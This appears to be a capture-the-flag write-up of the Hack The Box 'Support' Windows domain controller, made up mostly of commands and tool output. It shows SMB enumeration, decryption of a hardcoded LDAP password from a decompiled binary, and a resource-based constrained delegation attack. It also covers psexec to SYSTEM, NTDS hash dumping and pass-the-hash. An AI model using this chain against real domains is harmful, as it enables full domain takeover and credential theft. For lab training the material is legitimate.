Support

Recon

nmap_scan.log

Open 10.129.124.77:53
Open 10.129.124.77:88
Open 10.129.124.77:135
Open 10.129.124.77:139
Open 10.129.124.77:389
Open 10.129.124.77:445
Open 10.129.124.77:464
Open 10.129.124.77:593
Open 10.129.124.77:3268
Open 10.129.124.77:3269
Open 10.129.124.77:5985
Open 10.129.124.77:9389
Open 10.129.124.77:49667
Open 10.129.124.77:49664
Open 10.129.124.77:49678
Open 10.129.124.77:49690
Open 10.129.124.77:49707
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.124.77

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-13 23:33:53Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49678/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 6187/tcp): CLEAN (Timeout)
|   Check 2 (port 46929/tcp): CLEAN (Timeout)
|   Check 3 (port 10754/udp): CLEAN (Timeout)
|   Check 4 (port 24264/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 0s
| smb2-time: 
|   date: 2024-12-13T23:34:47
|_  start_date: N/A

SMB

└─$ netexec smb 10.129.124.77 -u 'guest' -p '' --shares
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.124.77   445    DC               [+] support.htb\guest:
SMB         10.129.124.77   445    DC               [*] Enumerated shares
SMB         10.129.124.77   445    DC               Share           Permissions     Remark
SMB         10.129.124.77   445    DC               -----           -----------     ------
SMB         10.129.124.77   445    DC               ADMIN$                          Remote Admin
SMB         10.129.124.77   445    DC               C$                              Default share
SMB         10.129.124.77   445    DC               IPC$            READ            Remote IPC
SMB         10.129.124.77   445    DC               NETLOGON                        Logon server share
SMB         10.129.124.77   445    DC               support-tools   READ            support staff tools
SMB         10.129.124.77   445    DC               SYSVOL                          Logon server share

For some reason spider_plus module didn't want to download the files...

└─$ netexec smb 10.129.124.77 -u 'letmein' -p '' -M spider_plus -o DOWNLOAD_FLAG=True

└─$ smbclient -N //10.129.124.77/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

                4026367 blocks of size 4096. 959152 blocks available
smb: \> get UserInfo.exe.zip
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (432.2 KiloBytes/sec) (average 432.2 KiloBytes/sec)
smb: \> exit

└─$ unzip UserInfo.exe.zip -d userinfo

Decompile: https://www.decompiler.com/jar/6f637a8b6b6d41509e4eb8f2e013227a/UserInfo.exe

└─$ unzip UserInfo.exe_Decompiler.com.zip -d decompiled

Password is hardcoded into *.exe

// decompiled/UserInfo.Services/LdapQuery.cs
	public LdapQuery()
	{
		string password = Protected.getPassword();
		entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
		entry.AuthenticationType = (AuthenticationTypes)1;
		ds = new DirectorySearcher(entry);
	}

// decompiled/UserInfo.Services/Protected.cs
using System;
using System.Text;

namespace UserInfo.Services;

internal class Protected {
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
	private static byte[] key = Encoding.ASCII.GetBytes("armando");

	public static string getPassword() {
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		for (int i = 0; i < array.Length; i++) {
			array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
		}
		
		  return Encoding.Default.GetString(array2);
	}
}

Decrypt using online runner:

// https://www.programiz.com/csharp-programming/online-compiler/
using System;
using System.Text; 

internal class Protected {
	private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
	private static byte[] key = Encoding.ASCII.GetBytes("armando");

	public static void Main(string[] args) {
		byte[] array = Convert.FromBase64String(enc_password);
		byte[] array2 = array;
		for (int i = 0; i < array.Length; i++) {
			array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
		}
		Console.WriteLine(Encoding.Default.GetString(array2));
	}
}

Credentials are valid.

└─$ netexec smb 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB         10.129.124.77   445    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

└─$ cicada-mastertul -t 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb --full
[!x!] Scanning 10.129.124.77
[!] Enumerating SMB...
 netexec smb 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
[-] Could not connect to SMB
[!] Connecting to WinRM...
 netexec winrm 10.129.124.77 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/bloodhound_results
[!] Enumerating LDAP...
ldapdomaindump -u 'support.htb\ldap'  -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -dc-ip 10.129.124.77 -o /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/ldap_results
[+] LDAP saved to /home/woyag/Desktop/Rooms/Support/mastertul/10.129.124.77/ldap_results
 [!x!] Cleaning up...

User support seems to be the entrypoint into the DC, but nothing valuable from ldapdomaindump

└─$ netexec ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(sAMAccountName=support)" ""
SMB         10.129.124.77   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
LDAP        10.129.124.77   389    DC               [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP        10.129.124.77   389    DC               [+] Response for object: CN=support,CN=Users,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               objectClass:         top person organizationalPerson user
LDAP        10.129.124.77   389    DC               cn:                  support
LDAP        10.129.124.77   389    DC               c:                   US
LDAP        10.129.124.77   389    DC               l:                   Chapel Hill
LDAP        10.129.124.77   389    DC               st:                  NC
LDAP        10.129.124.77   389    DC               postalCode:          27514
LDAP        10.129.124.77   389    DC               distinguishedName:   CN=support,CN=Users,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               instanceType:        4
LDAP        10.129.124.77   389    DC               whenCreated:         20220528111200.0Z
LDAP        10.129.124.77   389    DC               whenChanged:         20220528111201.0Z
LDAP        10.129.124.77   389    DC               uSNCreated:          12617
LDAP        10.129.124.77   389    DC               info:                Ironside47pleasure40Watchful
LDAP        10.129.124.77   389    DC               memberOf:            CN=Shared Support Accounts,CN=Users,DC=support,DC=htb CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               uSNChanged:          12630
LDAP        10.129.124.77   389    DC               company:             support
LDAP        10.129.124.77   389    DC               streetAddress:       Skipper Bowles Dr
LDAP        10.129.124.77   389    DC               name:                support
LDAP        10.129.124.77   389    DC               objectGUID:          0x0aa33931fa3130459ea48053b396a7f1
LDAP        10.129.124.77   389    DC               userAccountControl:  66048
LDAP        10.129.124.77   389    DC               badPwdCount:         1
LDAP        10.129.124.77   389    DC               codePage:            0
LDAP        10.129.124.77   389    DC               countryCode:         0
LDAP        10.129.124.77   389    DC               badPasswordTime:     133786086568708877
LDAP        10.129.124.77   389    DC               lastLogoff:          0
LDAP        10.129.124.77   389    DC               lastLogon:           0
LDAP        10.129.124.77   389    DC               pwdLastSet:          132982099209777070
LDAP        10.129.124.77   389    DC               primaryGroupID:      513
LDAP        10.129.124.77   389    DC               objectSid:           0x0105000000000005150000001bdbfd6381ba83c9e670420b51040000
LDAP        10.129.124.77   389    DC               accountExpires:      9223372036854775807
LDAP        10.129.124.77   389    DC               logonCount:          0
LDAP        10.129.124.77   389    DC               sAMAccountName:      support
LDAP        10.129.124.77   389    DC               sAMAccountType:      805306368
LDAP        10.129.124.77   389    DC               objectCategory:      CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
LDAP        10.129.124.77   389    DC               dSCorePropagationData: 20220528111201.0Z 16010101000000.0Z

WinRM

info field looks like password

└─$ netexec winrm support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
WINRM       10.129.124.77   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM       10.129.124.77   5985   DC               [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)

└─$ evil-winrm -i support.htb -u 'support' -p 'Ironside47pleasure40Watchful'
*Evil-WinRM* PS C:\Users\support\Documents> whoami /all

User Name       SID
=============== =============================================
support\support S-1-5-21-1677581083-3380853377-188903654-1105

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
SUPPORT\Shared Support Accounts            Group            S-1-5-21-1677581083-3380853377-188903654-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\support> cat Desktop/user.txt
71858ae992c4a296f17291fbc5e37185

Privilege Escalation

Enumerate with bloodhound

└─$ bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.129.124.77 -c All --zip -op support

Shadow Credentials attack was the first thing I tried, but it failed.

└─$ certipy-ad shadow auto -u 'support@support.htb' -p 'Ironside47pleasure40Watchful' -account Administrator -target dc.support.htb -dc-ip 10.129.124.77 -scheme ldap
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'Administrator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5e6222be-4b48-9b34-ac4d-63007d37e624'
[*] Adding Key Credential with device ID '5e6222be-4b48-9b34-ac4d-63007d37e624' to the Key Credentials for 'Administrator'
[-] Could not update Key Credentials for 'Administrator' due to insufficient access rights: 00002098: SecErr: DSID-03151473, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

Let's abuse delegations then. A Practical Guide To RBCD Exploitation

└─$ impacket-addcomputer -computer-name 'letmein$' -dc-ip 10.129.124.77 support.htb/support:'Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account letmein$ with password RSdLRUaAqDspQoTwGSeRmHco7AeJGCGh.

└─$ impacket-rbcd -delegate-to 'DC$' -delegate-from 'letmein$' -dc-ip 10.129.124.77 -action write support.htb/support:'Ironside47pleasure40Watchful'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] letmein$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     letmein$     (S-1-5-21-1677581083-3380853377-188903654-6101)

└─$ impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.129.124.77 'support.htb/letmein$:RSdLRUaAqDspQoTwGSeRmHco7AeJGCGh'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

└─$ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache

└─$ impacket-psexec -k -no-pass support.htb/administrator@dc.support.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file ONvjjNcN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service QXkm on dc.support.htb.....
[*] Starting service QXkm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

└─$ impacket-secretsdump -k -no-pass support.htb/Administrator@dc.support.htb -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6303be52e22950b5bcb764ff2b233302:::
ldap:1104:aad3b435b51404eeaad3b435b51404ee:b735f8c7172b49ca2b956b8015eb2ebe:::
support:1105:aad3b435b51404eeaad3b435b51404ee:11fbaef07d83e3f6cde9f0ff98a3af3d:::
smith.rosario:1106:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
hernandez.stanley:1107:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
wilson.shelby:1108:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
anderson.damian:1109:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
thomas.raphael:1110:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
levine.leopoldo:1111:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
raven.clifton:1112:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
bardot.mary:1113:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
cromwell.gerard:1114:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
monroe.david:1115:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
west.laura:1116:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
langley.lucy:1117:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
daughtler.mabel:1118:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
stoll.rachelle:1119:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
ford.victoria:1120:aad3b435b51404eeaad3b435b51404ee:0fab66daddc6ba42a3b0963123350706:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:fa894c2f0c6fa6aade22d50f19729873:::
letmein$:6101:aad3b435b51404eeaad3b435b51404ee:115b37daa4edb2ffb788bed030639f42:::
[*] Cleaning up...

└─$ evil-winrm -i support.htb -u 'administrator' -H 'bb06cbc02b39abeddd1335bc30b19e26'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
support\administrator

Root.txt

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
15f69c27b77961d2a1a3934619eaf05a

PreviousStocker NextSurveillance

Last updated 1 month ago

Recon

SMB

WinRM

User.txt

Privilege Escalation

Login 1

Login 2

Root.txt